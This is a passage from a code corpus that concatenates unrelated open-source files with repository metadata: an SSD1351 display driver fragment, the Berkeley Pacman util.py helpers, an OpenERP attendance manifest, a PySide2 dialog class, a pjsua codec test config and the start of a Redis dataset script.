self.command(SSD1351_DISPLAYOFFSET) # 0xA2
self.data(0x0)
self.command(SSD1351_SETGPIO)
self.data(0x00)
self.command(SSD1351_FUNCTIONSELECT)
self.data(0x01) #internal (diode drop)
self.command(SSD1351_PRECHARGE) # 0xB1
self.command(0x32)
self.command(SSD1351_VCOMH) # 0xBE
self.command(0x05)
self.command(SSD1351_NORMALDISPLAY) # 0xA6
self.command(SSD1351_CONTRASTABC)
self.data(0xC8)
self.data(0x80)
self.data(0xC8)
self.command(SSD1351_CONTRASTMASTER)
self.data(0x0F)
self.command(SSD1351_SETVSL)
self.data(0xA0)
self.data(0xB5)
self.data(0x55)
self.command(SSD1351_PRECHARGE2)
self.data(0x01)
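# Illustrative usage sketch (not part of the original library; the pin numbers
# and SPI device below are assumptions for a typical Raspberry Pi wiring):
#
#   import Adafruit_GPIO.SPI as SPI
#   disp = SSD1351_128_96(rst=24, dc=23, spi=SPI.SpiDev(0, 0))
#   disp.begin()
#   disp.rawfill(0, 0, disp.width, disp.height, disp.color565(255, 0, 0))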
|
twchad/Adafruit_Python_SSD1351
|
Adafruit_SSD1351/SSD1351.py
|
Python
|
mit
| 11,355 | 0.026244 |
# util.py
# -------
# Licensing Information: You are free to use or extend these projects for
# educational purposes provided that (1) you do not distribute or publish
# solutions, (2) you retain this notice, and (3) you provide clear
# attribution to UC Berkeley, including a link to http://ai.berkeley.edu.
#
# Attribution Information: The Pacman AI projects were developed at UC Berkeley.
# The core projects and autograders were primarily created by John DeNero
# (denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).
# Student side autograding was added by Brad Miller, Nick Hay, and
# Pieter Abbeel (pabbeel@cs.berkeley.edu).
import sys
import inspect
import heapq, random
import cStringIO
class FixedRandom:
def __init__(self):
fixedState = (3, (2147483648L, 507801126L, 683453281L, 310439348L, 2597246090L, \
2209084787L, 2267831527L, 979920060L, 3098657677L, 37650879L, 807947081L, 3974896263L, \
881243242L, 3100634921L, 1334775171L, 3965168385L, 746264660L, 4074750168L, 500078808L, \
776561771L, 702988163L, 1636311725L, 2559226045L, 157578202L, 2498342920L, 2794591496L, \
4130598723L, 496985844L, 2944563015L, 3731321600L, 3514814613L, 3362575829L, 3038768745L, \
2206497038L, 1108748846L, 1317460727L, 3134077628L, 988312410L, 1674063516L, 746456451L, \
3958482413L, 1857117812L, 708750586L, 1583423339L, 3466495450L, 1536929345L, 1137240525L, \
3875025632L, 2466137587L, 1235845595L, 4214575620L, 3792516855L, 657994358L, 1241843248L, \
1695651859L, 3678946666L, 1929922113L, 2351044952L, 2317810202L, 2039319015L, 460787996L, \
3654096216L, 4068721415L, 1814163703L, 2904112444L, 1386111013L, 574629867L, 2654529343L, \
3833135042L, 2725328455L, 552431551L, 4006991378L, 1331562057L, 3710134542L, 303171486L, \
1203231078L, 2670768975L, 54570816L, 2679609001L, 578983064L, 1271454725L, 3230871056L, \
2496832891L, 2944938195L, 1608828728L, 367886575L, 2544708204L, 103775539L, 1912402393L, \
1098482180L, 2738577070L, 3091646463L, 1505274463L, 2079416566L, 659100352L, 839995305L, \
1696257633L, 274389836L, 3973303017L, 671127655L, 1061109122L, 517486945L, 1379749962L, \
3421383928L, 3116950429L, 2165882425L, 2346928266L, 2892678711L, 2936066049L, 1316407868L, \
2873411858L, 4279682888L, 2744351923L, 3290373816L, 1014377279L, 955200944L, 4220990860L, \
2386098930L, 1772997650L, 3757346974L, 1621616438L, 2877097197L, 442116595L, 2010480266L, \
2867861469L, 2955352695L, 605335967L, 2222936009L, 2067554933L, 4129906358L, 1519608541L, \
1195006590L, 1942991038L, 2736562236L, 279162408L, 1415982909L, 4099901426L, 1732201505L, \
2934657937L, 860563237L, 2479235483L, 3081651097L, 2244720867L, 3112631622L, 1636991639L, \
3860393305L, 2312061927L, 48780114L, 1149090394L, 2643246550L, 1764050647L, 3836789087L, \
3474859076L, 4237194338L, 1735191073L, 2150369208L, 92164394L, 756974036L, 2314453957L, \
323969533L, 4267621035L, 283649842L, 810004843L, 727855536L, 1757827251L, 3334960421L, \
3261035106L, 38417393L, 2660980472L, 1256633965L, 2184045390L, 811213141L, 2857482069L, \
2237770878L, 3891003138L, 2787806886L, 2435192790L, 2249324662L, 3507764896L, 995388363L, \
856944153L, 619213904L, 3233967826L, 3703465555L, 3286531781L, 3863193356L, 2992340714L, \
413696855L, 3865185632L, 1704163171L, 3043634452L, 2225424707L, 2199018022L, 3506117517L, \
3311559776L, 3374443561L, 1207829628L, 668793165L, 1822020716L, 2082656160L, 1160606415L, \
3034757648L, 741703672L, 3094328738L, 459332691L, 2702383376L, 1610239915L, 4162939394L, \
557861574L, 3805706338L, 3832520705L, 1248934879L, 3250424034L, 892335058L, 74323433L, \
3209751608L, 3213220797L, 3444035873L, 3743886725L, 1783837251L, 610968664L, 580745246L, \
4041979504L, 201684874L, 2673219253L, 1377283008L, 3497299167L, 2344209394L, 2304982920L, \
3081403782L, 2599256854L, 3184475235L, 3373055826L, 695186388L, 2423332338L, 222864327L, \
1258227992L, 3627871647L, 3487724980L, 4027953808L, 3053320360L, 533627073L, 3026232514L, \
2340271949L, 867277230L, 868513116L, 2158535651L, 2487822909L, 3428235761L, 3067196046L, \
3435119657L, 1908441839L, 788668797L, 3367703138L, 3317763187L, 908264443L, 2252100381L, \
764223334L, 4127108988L, 384641349L, 3377374722L, 1263833251L, 1958694944L, 3847832657L, \
1253909612L, 1096494446L, 555725445L, 2277045895L, 3340096504L, 1383318686L, 4234428127L, \
1072582179L, 94169494L, 1064509968L, 2681151917L, 2681864920L, 734708852L, 1338914021L, \
1270409500L, 1789469116L, 4191988204L, 1716329784L, 2213764829L, 3712538840L, 919910444L, \
1318414447L, 3383806712L, 3054941722L, 3378649942L, 1205735655L, 1268136494L, 2214009444L, \
2532395133L, 3232230447L, 230294038L, 342599089L, 772808141L, 4096882234L, 3146662953L, \
2784264306L, 1860954704L, 2675279609L, 2984212876L, 2466966981L, 2627986059L, 2985545332L, \
2578042598L, 1458940786L, 2944243755L, 3959506256L, 1509151382L, 325761900L, 942251521L, \
4184289782L, 2756231555L, 3297811774L, 1169708099L, 3280524138L, 3805245319L, 3227360276L, \
3199632491L, 2235795585L, 2865407118L, 36763651L, 2441503575L, 3314890374L, 1755526087L, \
17915536L, 1196948233L, 949343045L, 3815841867L, 489007833L, 2654997597L, 2834744136L, \
417688687L, 2843220846L, 85621843L, 747339336L, 2043645709L, 3520444394L, 1825470818L, \
647778910L, 275904777L, 1249389189L, 3640887431L, 4200779599L, 323384601L, 3446088641L, \
4049835786L, 1718989062L, 3563787136L, 44099190L, 3281263107L, 22910812L, 1826109246L, \
745118154L, 3392171319L, 1571490704L, 354891067L, 815955642L, 1453450421L, 940015623L, \
796817754L, 1260148619L, 3898237757L, 176670141L, 1870249326L, 3317738680L, 448918002L, \
4059166594L, 2003827551L, 987091377L, 224855998L, 3520570137L, 789522610L, 2604445123L, \
454472869L, 475688926L, 2990723466L, 523362238L, 3897608102L, 806637149L, 2642229586L, \
2928614432L, 1564415411L, 1691381054L, 3816907227L, 4082581003L, 1895544448L, 3728217394L, \
3214813157L, 4054301607L, 1882632454L, 2873728645L, 3694943071L, 1297991732L, 2101682438L, \
3952579552L, 678650400L, 1391722293L, 478833748L, 2976468591L, 158586606L, 2576499787L, \
662690848L, 3799889765L, 3328894692L, 2474578497L, 2383901391L, 1718193504L, 3003184595L, \
3630561213L, 1929441113L, 3848238627L, 1594310094L, 3040359840L, 3051803867L, 2462788790L, \
954409915L, 802581771L, 681703307L, 545982392L, 2738993819L, 8025358L, 2827719383L, \
770471093L, 3484895980L, 3111306320L, 3900000891L, 2116916652L, 397746721L, 2087689510L, \
721433935L, 1396088885L, 2751612384L, 1998988613L, 2135074843L, 2521131298L, 707009172L, \
2398321482L, 688041159L, 2264560137L, 482388305L, 207864885L, 3735036991L, 3490348331L, \
1963642811L, 3260224305L, 3493564223L, 1939428454L, 1128799656L, 1366012432L, 2858822447L, \
1428147157L, 2261125391L, 1611208390L, 1134826333L, 2374102525L, 3833625209L, 2266397263L, \
3189115077L, 770080230L, 2674657172L, 4280146640L, 3604531615L, 4235071805L, 3436987249L, \
509704467L, 2582695198L, 4256268040L, 3391197562L, 1460642842L, 1617931012L, 457825497L, \
1031452907L, 1330422862L, 4125947620L, 2280712485L, 431892090L, 2387410588L, 2061126784L, \
896457479L, 3480499461L, 2488196663L, 4021103792L, 1877063114L, 2744470201L, 1046140599L, \
2129952955L, 3583049218L, 4217723693L, 2720341743L, 820661843L, 1079873609L, 3360954200L, \
3652304997L, 3335838575L, 2178810636L, 1908053374L, 4026721976L, 1793145418L, 476541615L, \
973420250L, 515553040L, 919292001L, 2601786155L, 1685119450L, 3030170809L, 1590676150L, \
1665099167L, 651151584L, 2077190587L, 957892642L, 646336572L, 2743719258L, 866169074L, \
851118829L, 4225766285L, 963748226L, 799549420L, 1955032629L, 799460000L, 2425744063L, \
2441291571L, 1928963772L, 528930629L, 2591962884L, 3495142819L, 1896021824L, 901320159L, \
3181820243L, 843061941L, 3338628510L, 3782438992L, 9515330L, 1705797226L, 953535929L, \
764833876L, 3202464965L, 2970244591L, 519154982L, 3390617541L, 566616744L, 3438031503L, \
1853838297L, 170608755L, 1393728434L, 676900116L, 3184965776L, 1843100290L, 78995357L, \
2227939888L, 3460264600L, 1745705055L, 1474086965L, 572796246L, 4081303004L, 882828851L, \
1295445825L, 137639900L, 3304579600L, 2722437017L, 4093422709L, 273203373L, 2666507854L, \
3998836510L, 493829981L, 1623949669L, 3482036755L, 3390023939L, 833233937L, 1639668730L, \
1499455075L, 249728260L, 1210694006L, 3836497489L, 1551488720L, 3253074267L, 3388238003L, \
2372035079L, 3945715164L, 2029501215L, 3362012634L, 2007375355L, 4074709820L, 631485888L, \
3135015769L, 4273087084L, 3648076204L, 2739943601L, 1374020358L, 1760722448L, 3773939706L, \
1313027823L, 1895251226L, 4224465911L, 421382535L, 1141067370L, 3660034846L, 3393185650L, \
1850995280L, 1451917312L, 3841455409L, 3926840308L, 1397397252L, 2572864479L, 2500171350L, \
3119920613L, 531400869L, 1626487579L, 1099320497L, 407414753L, 2438623324L, 99073255L, \
3175491512L, 656431560L, 1153671785L, 236307875L, 2824738046L, 2320621382L, 892174056L, \
230984053L, 719791226L, 2718891946L, 624L), None)
self.random = random.Random()
self.random.setstate(fixedState)
"""
Data structures useful for implementing SearchAgents
"""
class Stack:
"A container with a last-in-first-out (LIFO) queuing policy."
def __init__(self):
self.list = []
def push(self,item):
"Push 'item' onto the stack"
self.list.append(item)
def pop(self):
"Pop the most recently pushed item from the stack"
return self.list.pop()
def isEmpty(self):
"Returns true if the stack is empty"
return len(self.list) == 0
class Queue:
"A container with a first-in-first-out (FIFO) queuing policy."
def __init__(self):
self.list = []
def push(self,item):
"Enqueue the 'item' into the queue"
self.list.insert(0,item)
def pop(self):
"""
Dequeue the earliest enqueued item still in the queue. This
operation removes the item from the queue.
"""
return self.list.pop()
def isEmpty(self):
"Returns true if the queue is empty"
return len(self.list) == 0
class PriorityQueue:
"""
Implements a priority queue data structure. Each inserted item
has a priority associated with it and the client is usually interested
in quick retrieval of the lowest-priority item in the queue. This
data structure allows O(1) access to the lowest-priority item.
Note that this PriorityQueue does not allow you to change the priority
of an item. However, you may insert the same item multiple times with
different priorities.
"""
def __init__(self):
self.heap = []
self.count = 0
def push(self, item, priority):
        # Entries carry an insertion counter so that equal priorities pop in
        # FIFO order and unorderable items are never compared directly.
        entry = (priority, self.count, item)
heapq.heappush(self.heap, entry)
self.count += 1
def pop(self):
        (_, _, item) = heapq.heappop(self.heap)
return item
def isEmpty(self):
return len(self.heap) == 0
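# Illustrative sketch (not in the original handout): lower priorities pop
# first, and ties pop in insertion order thanks to the counter, e.g.
#   pq = PriorityQueue()
#   pq.push('b', 2); pq.push('a', 1); pq.push('c', 1)
#   pq.pop(); pq.pop(); pq.pop()   # -> 'a', then 'c', then 'b'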
class PriorityQueueWithFunction(PriorityQueue):
"""
Implements a priority queue with the same push/pop signature of the
Queue and the Stack classes. This is designed for drop-in replacement for
those two classes. The caller has to provide a priority function, which
extracts each item's priority.
"""
def __init__(self, priorityFunction):
"priorityFunction (item) -> priority"
self.priorityFunction = priorityFunction # store the priority function
PriorityQueue.__init__(self) # super-class initializer
def push(self, item):
"Adds an item to the queue with priority from the priority function"
PriorityQueue.push(self, item, self.priorityFunction(item))
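# Illustrative sketch: the same queue driven by a priority function, e.g. for
# (state, cost) search nodes ordered by cost:
#   frontier = PriorityQueueWithFunction(lambda node: node[1])
#   frontier.push(('goal', 3)); frontier.push(('start', 0))
#   frontier.pop()   # -> ('start', 0), the lowest-cost item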
def manhattanDistance( xy1, xy2 ):
"Returns the Manhattan distance between points xy1 and xy2"
return abs( xy1[0] - xy2[0] ) + abs( xy1[1] - xy2[1] )
"""
Data structures and functions useful for various course projects
The search project should not need anything below this line.
"""
class Counter(dict):
"""
A counter keeps track of counts for a set of keys.
The counter class is an extension of the standard python
dictionary type. It is specialized to have number values
(integers or floats), and includes a handful of additional
functions to ease the task of counting data. In particular,
all keys are defaulted to have value 0. Using a dictionary:
a = {}
print a['test']
would give an error, while the Counter class analogue:
>>> a = Counter()
>>> print a['test']
0
returns the default 0 value. Note that to reference a key
that you know is contained in the counter,
you can still use the dictionary syntax:
>>> a = Counter()
>>> a['test'] = 2
>>> print a['test']
2
This is very useful for counting things without initializing their counts,
see for example:
>>> a['blah'] += 1
>>> print a['blah']
1
The counter also includes additional functionality useful in implementing
the classifiers for this assignment. Two counters can be added,
subtracted or multiplied together. See below for details. They can
also be normalized and their total count and arg max can be extracted.
"""
def __getitem__(self, idx):
self.setdefault(idx, 0)
return dict.__getitem__(self, idx)
def incrementAll(self, keys, count):
"""
Increments all elements of keys by the same count.
>>> a = Counter()
>>> a.incrementAll(['one','two', 'three'], 1)
>>> a['one']
1
>>> a['two']
1
"""
for key in keys:
self[key] += count
def argMax(self):
"""
Returns the key with the highest value.
"""
if len(self.keys()) == 0: return None
all = self.items()
values = [x[1] for x in all]
maxIndex = values.index(max(values))
return all[maxIndex][0]
def sortedKeys(self):
"""
Returns a list of keys sorted by their values. Keys
with the highest values will appear first.
>>> a = Counter()
>>> a['first'] = -2
>>> a['second'] = 4
>>> a['third'] = 1
>>> a.sortedKeys()
['second', 'third', 'first']
"""
sortedItems = self.items()
compare = lambda x, y: sign(y[1] - x[1])
sortedItems.sort(cmp=compare)
return [x[0] for x in sortedItems]
def totalCount(self):
"""
Returns the sum of counts for all keys.
"""
return sum(self.values())
def normalize(self):
"""
Edits the counter such that the total count of all
keys sums to 1. The ratio of counts for all keys
        will remain the same. Note that normalizing an empty
        Counter (with a total count of zero) simply leaves it unchanged.
"""
total = float(self.totalCount())
if total == 0: return
for key in self.keys():
self[key] = self[key] / total
def divideAll(self, divisor):
"""
Divides all counts by divisor
"""
divisor = float(divisor)
for key in self:
self[key] /= divisor
def copy(self):
"""
Returns a copy of the counter
"""
return Counter(dict.copy(self))
def __mul__(self, y ):
"""
Multiplying two counters gives the dot product of their vectors where
each unique label is a vector element.
>>> a = Counter()
>>> b = Counter()
>>> a['first'] = -2
>>> a['second'] = 4
>>> b['first'] = 3
>>> b['second'] = 5
>>> a['third'] = 1.5
>>> a['fourth'] = 2.5
>>> a * b
14
"""
sum = 0
x = self
if len(x) > len(y):
x,y = y,x
for key in x:
if key not in y:
continue
sum += x[key] * y[key]
return sum
def __radd__(self, y):
"""
Adding another counter to a counter increments the current counter
by the values stored in the second counter.
>>> a = Counter()
>>> b = Counter()
>>> a['first'] = -2
>>> a['second'] = 4
>>> b['first'] = 3
>>> b['third'] = 1
>>> a += b
>>> a['first']
1
"""
for key, value in y.items():
self[key] += value
def __add__( self, y ):
"""
Adding two counters gives a counter with the union of all keys and
counts of the second added to counts of the first.
>>> a = Counter()
>>> b = Counter()
>>> a['first'] = -2
>>> a['second'] = 4
>>> b['first'] = 3
>>> b['third'] = 1
>>> (a + b)['first']
1
"""
addend = Counter()
for key in self:
if key in y:
addend[key] = self[key] + y[key]
else:
addend[key] = self[key]
for key in y:
if key in self:
continue
addend[key] = y[key]
return addend
def __sub__( self, y ):
"""
Subtracting a counter from another gives a counter with the union of all keys and
counts of the second subtracted from counts of the first.
>>> a = Counter()
>>> b = Counter()
>>> a['first'] = -2
>>> a['second'] = 4
>>> b['first'] = 3
>>> b['third'] = 1
>>> (a - b)['first']
-5
"""
addend = Counter()
for key in self:
if key in y:
addend[key] = self[key] - y[key]
else:
addend[key] = self[key]
for key in y:
if key in self:
continue
addend[key] = -1 * y[key]
return addend
def raiseNotDefined():
fileName = inspect.stack()[1][1]
line = inspect.stack()[1][2]
method = inspect.stack()[1][3]
print "*** Method not implemented: %s at line %s of %s" % (method, line, fileName)
sys.exit(1)
def normalize(vectorOrCounter):
"""
normalize a vector or counter by dividing each value by the sum of all values
"""
normalizedCounter = Counter()
if type(vectorOrCounter) == type(normalizedCounter):
counter = vectorOrCounter
total = float(counter.totalCount())
if total == 0: return counter
for key in counter.keys():
value = counter[key]
normalizedCounter[key] = value / total
return normalizedCounter
else:
vector = vectorOrCounter
s = float(sum(vector))
if s == 0: return vector
return [el / s for el in vector]
def nSample(distribution, values, n):
if sum(distribution) != 1:
distribution = normalize(distribution)
rand = [random.random() for i in range(n)]
rand.sort()
samples = []
samplePos, distPos, cdf = 0,0, distribution[0]
while samplePos < n:
if rand[samplePos] < cdf:
samplePos += 1
samples.append(values[distPos])
else:
distPos += 1
cdf += distribution[distPos]
return samples
def sample(distribution, values = None):
if type(distribution) == Counter:
items = sorted(distribution.items())
distribution = [i[1] for i in items]
values = [i[0] for i in items]
if sum(distribution) != 1:
distribution = normalize(distribution)
choice = random.random()
    i, total = 0, distribution[0]
while choice > total:
i += 1
total += distribution[i]
return values[i]
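# Illustrative sketch: sample() accepts parallel lists or a Counter and
# normalizes the weights itself, e.g.
#   sample([0.8, 0.2], ['heads', 'tails'])   # -> 'heads' about 80% of the time
#   sample(Counter({'a': 3, 'b': 1}))        # -> 'a' about 75% of the time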
def sampleFromCounter(ctr):
items = sorted(ctr.items())
return sample([v for k,v in items], [k for k,v in items])
def getProbability(value, distribution, values):
"""
Gives the probability of a value under a discrete distribution
defined by (distributions, values).
"""
total = 0.0
for prob, val in zip(distribution, values):
if val == value:
total += prob
return total
def flipCoin( p ):
r = random.random()
return r < p
def chooseFromDistribution( distribution ):
"Takes either a counter or a list of (prob, key) pairs and samples"
if type(distribution) == dict or type(distribution) == Counter:
return sample(distribution)
r = random.random()
base = 0.0
for prob, element in distribution:
base += prob
if r <= base: return element
def nearestPoint( pos ):
"""
Finds the nearest grid point to a position (discretizes).
"""
( current_row, current_col ) = pos
grid_row = int( current_row + 0.5 )
grid_col = int( current_col + 0.5 )
return ( grid_row, grid_col )
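# Illustrative sketch: nearestPoint((3.7, 4.2)) -> (4, 4); adding 0.5 before
# truncating rounds to the nearest grid cell instead of always rounding down.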
def sign( x ):
"""
Returns 1 or -1 depending on the sign of x
"""
if( x >= 0 ):
return 1
else:
return -1
def arrayInvert(array):
"""
Inverts a matrix stored as a list of lists.
"""
    result = [[] for i in array[0]]  # one output row per input column
for outer in array:
for inner in range(len(outer)):
result[inner].append(outer[inner])
return result
def matrixAsList( matrix, value = True ):
"""
Turns a matrix into a list of coordinates matching the specified value
"""
rows, cols = len( matrix ), len( matrix[0] )
cells = []
for row in range( rows ):
for col in range( cols ):
if matrix[row][col] == value:
cells.append( ( row, col ) )
return cells
def lookup(name, namespace):
"""
Get a method or class from any imported module from its name.
Usage: lookup(functionName, globals())
"""
dots = name.count('.')
if dots > 0:
moduleName, objName = '.'.join(name.split('.')[:-1]), name.split('.')[-1]
module = __import__(moduleName)
return getattr(module, objName)
else:
modules = [obj for obj in namespace.values() if str(type(obj)) == "<type 'module'>"]
options = [getattr(module, name) for module in modules if name in dir(module)]
options += [obj[1] for obj in namespace.items() if obj[0] == name ]
if len(options) == 1: return options[0]
    if len(options) > 1: raise Exception, 'Name conflict for %s' % name
raise Exception, '%s not found as a method or class' % name
def pause():
"""
Pauses the output stream awaiting user feedback.
"""
print "<Press enter/return to continue>"
raw_input()
# code to handle timeouts
#
# FIXME
# NOTE: TimeoutFunction is NOT reentrant. Later timeouts will silently
# disable earlier timeouts. Could be solved by maintaining a global list
# of active time outs. Currently, questions which have test cases calling
# this have all student code so wrapped.
#
import signal
import time
class TimeoutFunctionException(Exception):
"""Exception to raise on a timeout"""
pass
class TimeoutFunction:
def __init__(self, function, timeout):
self.timeout = timeout
self.function = function
def handle_timeout(self, signum, frame):
raise TimeoutFunctionException()
def __call__(self, *args, **keyArgs):
# If we have SIGALRM signal, use it to cause an exception if and
# when this function runs too long. Otherwise check the time taken
# after the method has returned, and throw an exception then.
if hasattr(signal, 'SIGALRM'):
old = signal.signal(signal.SIGALRM, self.handle_timeout)
signal.alarm(self.timeout)
try:
result = self.function(*args, **keyArgs)
finally:
signal.signal(signal.SIGALRM, old)
signal.alarm(0)
else:
startTime = time.time()
result = self.function(*args, **keyArgs)
timeElapsed = time.time() - startTime
if timeElapsed >= self.timeout:
self.handle_timeout(None, None)
return result
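# Illustrative sketch (the wrapped function and its arguments are assumed):
#   bounded = TimeoutFunction(someSlowFunction, 2)   # 2-second budget
#   try:
#       result = bounded(args)
#   except TimeoutFunctionException:
#       print "someSlowFunction timed out"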
_ORIGINAL_STDOUT = None
_ORIGINAL_STDERR = None
_MUTED = False
class WritableNull:
def write(self, string):
pass
def mutePrint():
global _ORIGINAL_STDOUT, _ORIGINAL_STDERR, _MUTED
if _MUTED:
return
_MUTED = True
_ORIGINAL_STDOUT = sys.stdout
#_ORIGINAL_STDERR = sys.stderr
sys.stdout = WritableNull()
#sys.stderr = WritableNull()
def unmutePrint():
global _ORIGINAL_STDOUT, _ORIGINAL_STDERR, _MUTED
if not _MUTED:
return
_MUTED = False
sys.stdout = _ORIGINAL_STDOUT
#sys.stderr = _ORIGINAL_STDERR
|
omardroubi/Artificial-Intelligence
|
Projects/Project4/bayesNets/util.py
|
Python
|
apache-2.0
| 25,733 | 0.014728 |
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Attendances',
'version': '1.1',
'category': 'Human Resources',
'description': """
This module aims to manage employee's attendances.
==================================================
Keeps account of the attendances of the employees on the basis of the
actions(Sign in/Sign out) performed by them.
""",
'author': 'OpenERP SA',
'images': ['images/hr_attendances.jpeg'],
'depends': ['hr'],
'data': [
'security/ir_rule.xml',
'security/ir.model.access.csv',
'hr_attendance_view.xml',
'hr_attendance_report.xml',
'wizard/hr_attendance_bymonth_view.xml',
'wizard/hr_attendance_byweek_view.xml',
'wizard/hr_attendance_error_view.xml',
'res_config_view.xml',
],
'demo': ['hr_attendance_demo.xml'],
'test': [
'test/attendance_process.yml',
'test/hr_attendance_report.yml',
],
'installable': True,
'auto_install': False,
#web
"js": ["static/src/js/attendance.js"],
'qweb' : ["static/src/xml/attendance.xml"],
'css' : ["static/src/css/slider.css"],
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
inovtec-solutions/OpenERP
|
openerp/addons/hr_attendance/__openerp__.py
|
Python
|
agpl-3.0
| 2,163 | 0.001849 |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'replace_with_ref_dialog_ui.ui'
#
# Created: Fri Nov 18 22:58:33 2016
# by: pyside2-uic running on PySide2 2.0.0~alpha0
#
# WARNING! All changes made in this file will be lost!
from PySide2 import QtCore, QtGui, QtWidgets
class Ui_Dialog(object):
def setupUi(self, Dialog):
Dialog.setObjectName("Dialog")
Dialog.resize(520, 174)
self.verticalLayout = QtWidgets.QVBoxLayout(Dialog)
self.verticalLayout.setContentsMargins(6, 6, 6, 6)
self.verticalLayout.setObjectName("verticalLayout")
self.groupBox = QtWidgets.QGroupBox(Dialog)
self.groupBox.setTitle("")
self.groupBox.setObjectName("groupBox")
self.horizontalLayout = QtWidgets.QHBoxLayout(self.groupBox)
self.horizontalLayout.setObjectName("horizontalLayout")
self.uiLBL_text = QtWidgets.QLabel(self.groupBox)
self.uiLBL_text.setTextFormat(QtCore.Qt.RichText)
self.uiLBL_text.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignTop)
self.uiLBL_text.setWordWrap(True)
self.uiLBL_text.setObjectName("uiLBL_text")
self.horizontalLayout.addWidget(self.uiLBL_text)
self.verticalLayout.addWidget(self.groupBox)
self.horizontalLayout_2 = QtWidgets.QHBoxLayout()
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_2.addItem(spacerItem)
self.uiBTN_saveReplace = QtWidgets.QPushButton(Dialog)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.uiBTN_saveReplace.sizePolicy().hasHeightForWidth())
self.uiBTN_saveReplace.setSizePolicy(sizePolicy)
self.uiBTN_saveReplace.setObjectName("uiBTN_saveReplace")
self.horizontalLayout_2.addWidget(self.uiBTN_saveReplace)
self.uiBTN_replace = QtWidgets.QPushButton(Dialog)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.uiBTN_replace.sizePolicy().hasHeightForWidth())
self.uiBTN_replace.setSizePolicy(sizePolicy)
self.uiBTN_replace.setObjectName("uiBTN_replace")
self.horizontalLayout_2.addWidget(self.uiBTN_replace)
self.uiBTN_cancel = QtWidgets.QPushButton(Dialog)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.uiBTN_cancel.sizePolicy().hasHeightForWidth())
self.uiBTN_cancel.setSizePolicy(sizePolicy)
self.uiBTN_cancel.setObjectName("uiBTN_cancel")
self.horizontalLayout_2.addWidget(self.uiBTN_cancel)
spacerItem1 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_2.addItem(spacerItem1)
self.horizontalLayout_2.setStretch(1, 1)
self.horizontalLayout_2.setStretch(2, 1)
self.horizontalLayout_2.setStretch(3, 1)
self.verticalLayout.addLayout(self.horizontalLayout_2)
self.verticalLayout.setStretch(0, 1)
self.retranslateUi(Dialog)
QtCore.QObject.connect(self.uiBTN_saveReplace, QtCore.SIGNAL("clicked()"), Dialog.onSaveReplaceClicked)
QtCore.QObject.connect(self.uiBTN_replace, QtCore.SIGNAL("clicked()"), Dialog.onReplaceClicked)
QtCore.QObject.connect(self.uiBTN_cancel, QtCore.SIGNAL("clicked()"), Dialog.onCancelClicked)
QtCore.QObject.connect(Dialog, QtCore.SIGNAL("finished(int)"), Dialog.onDialogFinished)
QtCore.QMetaObject.connectSlotsByName(Dialog)
def retranslateUi(self, Dialog):
Dialog.setWindowTitle(QtWidgets.QApplication.translate("Dialog", "Replace With Reference", None, -1))
self.uiLBL_text.setText(QtWidgets.QApplication.translate("Dialog", "Text", None, -1))
self.uiBTN_saveReplace.setText(QtWidgets.QApplication.translate("Dialog", "Save and Replace", None, -1))
self.uiBTN_replace.setText(QtWidgets.QApplication.translate("Dialog", "Replace", None, -1))
self.uiBTN_cancel.setText(QtWidgets.QApplication.translate("Dialog", "Cancel", None, -1))
|
theetcher/fxpt
|
fxpt/fx_refsystem/replace_with_ref_dialog_ui2.py
|
Python
|
mit
| 4,622 | 0.004976 |
# $Id: 201_codec_l16_16000.py 369517 2012-07-01 17:28:57Z file $
#
from inc_cfg import *
# Call with L16/16000/1 codec
test_param = TestParam(
"PESQ codec L16/16000/1 (RX side uses snd dev)",
[
InstanceParam("UA1", "--max-calls=1 --add-codec L16/16000/1 --clock-rate 16000 --play-file wavs/input.16.wav --null-audio"),
InstanceParam("UA2", "--max-calls=1 --add-codec L16/16000/1 --clock-rate 16000 --rec-file wavs/tmp.16.wav --auto-answer 200")
]
)
if (HAS_SND_DEV == 0):
test_param.skip = True
pesq_threshold = 3.5
|
fluentstream/asterisk-p2p
|
res/pjproject/tests/pjsua/scripts-pesq/201_codec_l16_16000.py
|
Python
|
gpl-2.0
| 537 | 0.01676 |
# ==============================================================================
# Copyright 2019 - Philip Paquette
#
# NOTICE: Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# ==============================================================================
""" Redis dataset
    - Populates the Redis server with the supervised games
